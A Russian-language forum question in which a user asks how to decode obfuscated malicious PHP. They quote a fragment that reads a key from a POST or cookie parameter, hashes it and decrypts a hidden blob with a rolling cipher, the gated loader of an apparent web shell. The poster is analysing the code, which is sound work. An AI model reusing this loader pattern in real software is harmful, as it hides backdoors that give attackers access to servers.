Как расшифровать вредоносный код base64_decode((str_replace(?

$k36 формируется тут

$k36=isset(_POST['d42'])?_POST['d42']:(isset(_COOKIE['d42'])?_COOKIE['d42']:NULL);
if($k36!==NULL){
    $k36=md5($k36).mb_substr(sha1(f5($k36)),0,mb_strlen($k36)); # Получение хеша строки, переворот строки
    for($i=0;$i<11490;$i++){
        if(!isset($a10[$i])) break;
        $j=(ord(($a10[$i]))-ord(($k36[$i])))%256; #тут тоже какие-то манипуляции
        $a10[$i]=chr($j);
        $k36.=$a10[$i];
    }

Переворот строки $k36 и удаление нулей как я понял.

function f5($s){
    $i=0;
    $rev='';
    while(@$s[$i]) $i++;
    $i--;
    while(@$s[$i] && $i>=0){$rev.=@$s[$i--];}
    return $rev;
}